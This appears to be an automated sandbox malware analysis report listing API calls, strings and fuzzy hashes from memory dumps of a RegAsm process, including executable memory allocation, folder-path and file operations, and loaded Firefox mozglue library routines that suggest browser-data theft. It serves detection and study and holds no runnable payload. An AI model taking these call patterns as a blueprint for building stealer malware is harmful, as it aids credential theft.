                                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00407874
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                        • Opcode ID: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                        • Instruction ID: 58502b0b00c881bab5b754626ee9ce4ad9b10c36d9ff74d45ae59ae86afa5875
                                                                                                                                                        • Opcode Fuzzy Hash: c062e49b8eac24d7b45a027ae12e9eff25198202155d78bc8260cd663ae55519
                                                                                                                                                        • Instruction Fuzzy Hash: C311B472A44705ABC724CFB8C989B9BB7F4EB40714F24483EE54AE7390E274B940C715
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.MSVCRT ref: 0041CBC9
                                                                                                                                                          • Part of subcall function 0041BB6C: lstrlenA.KERNEL32(?,0041CBDA,0041CC7C,00000000,06400000,00000003,00000000,0041757F,.exe,00436C5C,00436C58,00436C54,00436C50,00436C4C,00436C48,00436C44), ref: 0041BB9E
                                                                                                                                                          • Part of subcall function 0041BB6C: malloc.MSVCRT ref: 0041BBA6
                                                                                                                                                          • Part of subcall function 0041BB6C: lstrcpyA.KERNEL32(00000000,?), ref: 0041BBB1
                                                                                                                                                        • malloc.MSVCRT ref: 0041CC06
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc$lstrcpylstrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2974738957-0
                                                                                                                                                        • Opcode ID: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                        • Instruction ID: ee4a01d13f6e4d683757beabffaaf009a5c9ff74aa08d02828624340765fdc95
                                                                                                                                                        • Opcode Fuzzy Hash: 4595bf6652bd861db47711c07eba1f475a4793355c0293ea92a90e9bc1e457ce
                                                                                                                                                        • Instruction Fuzzy Hash: FBF0F0766482119BC7206F66EC8199BBB94EB447A0F054027EE08DB341EA38DC8083E8
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                        • Instruction ID: 897ff34fa84f0db00a67010516d6b662afcd179cf6ab32d5fb27a0f78a31b5bc
                                                                                                                                                        • Opcode Fuzzy Hash: 0c3e17c25d90c619f2ab5d0386ea12a1a651b811a3425f2742f6fd215a245168
                                                                                                                                                        • Instruction Fuzzy Hash: 34516031901201BBCE717BEE854AAF6B6D69FA0318B14048FF814AA232DF2D8DC45E5D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                        • Instruction ID: 6bc4e95e4b4d41cd45bcf0090cf4f159da268bf51a5422b08fd3501f4d4963e9
                                                                                                                                                        • Opcode Fuzzy Hash: f4aee46d942c90ee67f27d5e8fe5d8177bbf388d1cde3035c6f676b54f388a22
                                                                                                                                                        • Instruction Fuzzy Hash: 01319E71D0C2149FDF16DF55D8808AEBBB1EF84354B20816BE411B7391D738AE41DB9A
                                                                                                                                                        APIs
                                                                                                                                                        • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FolderPathlstrcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1699248803-0
                                                                                                                                                        • Opcode ID: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                        • Instruction ID: 1ebf8f7d6142e25c21b1da41a8396f416a06ca8f5008f9c8fada1f01269fc293
                                                                                                                                                        • Opcode Fuzzy Hash: 9a3c1d09b9e40a7597b2cc7da5ca01c1bb16281017e0bed6a10907c5fe9172cb
                                                                                                                                                        • Instruction Fuzzy Hash: 30F03AB1E0015DABDB15DF78DC909EEB7FDEB48204F0045BAB909D3281EA349F458B94
                                                                                                                                                        APIs
                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                        • Opcode ID: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                        • Instruction ID: 4d5d301e7642eb8bcabe02fa2709f808051272e3482dadb5ff4d38445e53d8c5
                                                                                                                                                        • Opcode Fuzzy Hash: c785e1c56cc5dd1355e14f627ee0373bbc421026e3e3e1ef34d967437d0958bc
                                                                                                                                                        • Instruction Fuzzy Hash: 56D05E31A00138578B5097A9FC044DEBB49CB817B5B005263FA6D9A2F0C265AD9242D8
                                                                                                                                                        APIs
                                                                                                                                                        • SHFileOperationA.SHELL32(?), ref: 00412577
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileOperation
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3080627654-0
                                                                                                                                                        • Opcode ID: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                                                        • Instruction ID: ef242af97a818274634bdf18eaf41cd9f3ea813bb85b2b5ad444d7661f99d088
                                                                                                                                                        • Opcode Fuzzy Hash: 11d7e75e8fb048daadeff50fbe913edc7fb5e8de74ef351f238d313e6dfef050
                                                                                                                                                        • Instruction Fuzzy Hash: CAE09AB0D0420E9FDF44EFE4D5152DDBAF8BF08308F40916AC115F3240E37442058BA9
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                        • Opcode ID: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                        • Instruction ID: f25db29369a0cc3c2a63bcf2525b0a85751bd4b2dcebbf23d4fd8c8c2b96b222
                                                                                                                                                        • Opcode Fuzzy Hash: 7e1ead8f594ffd37a66fe6362eb29383efb9f19d531e1b4cac10d1b83140b9e0
                                                                                                                                                        • Instruction Fuzzy Hash: 3021F6742007148FC320DF6ED485996B7F1FF49324B18886EEA8A8B722C776E881CB55
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: malloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2803490479-0
                                                                                                                                                        • Opcode ID: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                        • Instruction ID: a2ed24522b90cf8d72a71430dfd18e5bb138dd64580460ce79602bb5834a96d0
                                                                                                                                                        • Opcode Fuzzy Hash: cd808f50b226156c54d12c7445b6016a60ba6ba0c8715662d5550310cd1c8d18
                                                                                                                                                        • Instruction Fuzzy Hash: EAE0EDB1A10108BFEB40DBA9D845A9EBBF8EF44254F1440BAE905E3281E670EE009B55
                                                                                                                                                        APIs
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C615492
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6154A8
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6154BE
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C6154DB
                                                                                                                                                          • Part of subcall function 6C63AB3F: EnterCriticalSection.KERNEL32(6C68E370,?,?,6C603527,6C68F6CC,?,?,?,?,?,?,?,?,6C603284), ref: 6C63AB49
                                                                                                                                                          • Part of subcall function 6C63AB3F: LeaveCriticalSection.KERNEL32(6C68E370,?,6C603527,6C68F6CC,?,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63AB7C
                                                                                                                                                          • Part of subcall function 6C63CBE8: GetCurrentProcess.KERNEL32(?,6C6031A7), ref: 6C63CBF1
                                                                                                                                                          • Part of subcall function 6C63CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6031A7), ref: 6C63CBFA
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C6154F9
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C615516
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C61556A
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C615577
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000070), ref: 6C615585
                                                                                                                                                        • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C615590
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C6155E6
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(6C68F4B8), ref: 6C615606
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C615616
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C61563E
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C615646
                                                                                                                                                        • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C61567C
                                                                                                                                                        • free.MOZGLUE(?), ref: 6C6156AE
                                                                                                                                                          • Part of subcall function 6C625E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C625EDB
                                                                                                                                                          • Part of subcall function 6C625E90: memset.VCRUNTIME140(ewfl,000000E5,?), ref: 6C625F27
                                                                                                                                                          • Part of subcall function 6C625E90: LeaveCriticalSection.KERNEL32(?), ref: 6C625FB2
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C6156E8
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C615707
                                                                                                                                                        • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C61570F
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C615729
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C61574E
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C61576B
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C615796
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C6157B3
                                                                                                                                                        • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C6157CA
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C615749
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C615CF9
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C615AC9
                                                                                                                                                        • GeckoMain, xrefs: 6C615554, 6C6155D5
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C615717
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C615D01
                                                                                                                                                        • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6154A3
                                                                                                                                                        • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C6156E3
                                                                                                                                                        • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C615724
                                                                                                                                                        • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C6157C5
                                                                                                                                                        • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C61548D
                                                                                                                                                        • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6154B9
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C615D2B
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C615D24
                                                                                                                                                        • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C6157AE
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C615B38
                                                                                                                                                        • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C615BBE
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C615C56
                                                                                                                                                        • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C61584E
                                                                                                                                                        • MOZ_BASE_PROFILER_HELP, xrefs: 6C615511
                                                                                                                                                        • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C615766
                                                                                                                                                        • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C615D1C
                                                                                                                                                        • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C615791
                                                                                                                                                        • [I %d/%d] profiler_init, xrefs: 6C61564E
                                                                                                                                                        • MOZ_PROFILER_STARTUP, xrefs: 6C6155E1
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                                                                                                        • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                                                                                                        • API String ID: 3686969729-1266492768
                                                                                                                                                        • Opcode ID: 3f5a898c5550ba3ccd22ef18c3955e64441f67c5635447c2a3ad9b2b93a5e1c8
                                                                                                                                                        • Instruction ID: 9b3eebca2a09816a9ad148be7ac935062ce6ce9232a696a570c1d45ebb3c07f0
                                                                                                                                                        • Opcode Fuzzy Hash: 3f5a898c5550ba3ccd22ef18c3955e64441f67c5635447c2a3ad9b2b93a5e1c8
                                                                                                                                                        • Instruction Fuzzy Hash: C4220670909340AFDB009F7AC89465AB7B4EF8734DF144A2AE94697F41E7318449CBAF
                                                                                                                                                        APIs
                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C616CCC
                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C616D11
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000000C), ref: 6C616D26
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C616D35
                                                                                                                                                        • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C616D53
                                                                                                                                                        • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C616D73
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C616D80
                                                                                                                                                        • CertGetNameStringW.CRYPT32 ref: 6C616DC0
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C616DDC
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C616DEB
                                                                                                                                                        • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C616DFF
                                                                                                                                                        • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C616E10
                                                                                                                                                        • CryptMsgClose.CRYPT32(00000000), ref: 6C616E27
                                                                                                                                                        • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C616E34
                                                                                                                                                        • CreateFileW.KERNEL32 ref: 6C616EF9
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000), ref: 6C616F7D
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C616F8C
                                                                                                                                                        • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C61709D
                                                                                                                                                        • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C617103
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C617153
                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6C617176
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C617209
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61723A
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61726B
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61729C
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C6172DC
                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 6C61730D
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C6173C2
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6173F3
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C6173FF
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C617406
                                                                                                                                                        • VerSetConditionMask.NTDLL ref: 6C61740D
                                                                                                                                                        • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C61741A
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C61755A
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C617568
                                                                                                                                                        • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C617585
                                                                                                                                                        • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C617598
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C6175AC
                                                                                                                                                          • Part of subcall function 6C63AB89: EnterCriticalSection.KERNEL32(6C68E370,?,?,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284), ref: 6C63AB94
                                                                                                                                                          • Part of subcall function 6C63AB89: LeaveCriticalSection.KERNEL32(6C68E370,?,6C6034DE,6C68F6CC,?,?,?,?,?,?,?,6C603284,?,?,6C6256F6), ref: 6C63ABD1
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                                                                                                        • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                                                                                                        • API String ID: 3256780453-3980470659
                                                                                                                                                        • Opcode ID: 471befc7dd6b72a89c959d630a0c39f7d28203c01940ba93425210834b5fa193
                                                                                                                                                        • Instruction ID: 776e54fa2c918ecea155374d5f2abefb529f8b7942cfe2e038167aa4728e9068
                                                                                                                                                        • Opcode Fuzzy Hash: 471befc7dd6b72a89c959d630a0c39f7d28203c01940ba93425210834b5fa193
                                                                                                                                                        • Instruction Fuzzy Hash: 175209B1A05314AFEB21CF29CC84BAA77BCEF46305F104599E50997A40DB70AF85CF69
                                                                                                                                                        APIs
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C640F1F
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C640F99
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,?), ref: 6C640FB7
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C640FE9
                                                                                                                                                        • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C641031
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C6410D0
                                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 6C64117D
                                                                                                                                                        • memset.VCRUNTIME140(?,000000E5,?), ref: 6C641C39
                                                                                                                                                        • EnterCriticalSection.KERNEL32(6C68E744), ref: 6C643391
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(6C68E744), ref: 6C6433CD
                                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 6C643431
                                                                                                                                                        • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C643437
                                                                                                                                                        Strings
                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C6437A8
                                                                                                                                                        • : (malloc) Unsupported character in malloc options: ', xrefs: 6C643A02
                                                                                                                                                        • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C6437BD
                                                                                                                                                        • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C643793
                                                                                                                                                        • MOZ_CRASH(), xrefs: 6C643950
                                                                                                                                                        • <jemalloc>, xrefs: 6C643941, 6C6439F1
                                                                                                                                                        • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C643559, 6C64382D, 6C643848
                                                                                                                                                        • Compile-time page size does not divide the runtime one., xrefs: 6C643946
                                                                                                                                                        • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C6437D2
                                                                                                                                                        • MALLOC_OPTIONS, xrefs: 6C6435FE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                                                                                                        • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                                                                                                        • API String ID: 3040639385-4173974723
                                                                                                                                                        • Opcode ID: 499fcf740a949e3361e6b6bd0b3e1e600db798932e96e550855fa7dbd7422eed
                                                                                                                                                        • Instruction ID: cce3376e1def342b42884a8866a2c33e757db5d759540a6421e82223492a5a20
                                                                                                                                                        • Opcode Fuzzy Hash: 499fcf740a949e3361e6b6bd0b3e1e600db798932e96e550855fa7dbd7422eed
                                                                                                                                                        • Instruction Fuzzy Hash: 2053AD71A057018FC704CF29C580616FBE1BF8A328F29C66DE869DB791D771E852CB89
                                                                                                                                                        APIs
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C663527
                                                                                                                                                        • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C66355B
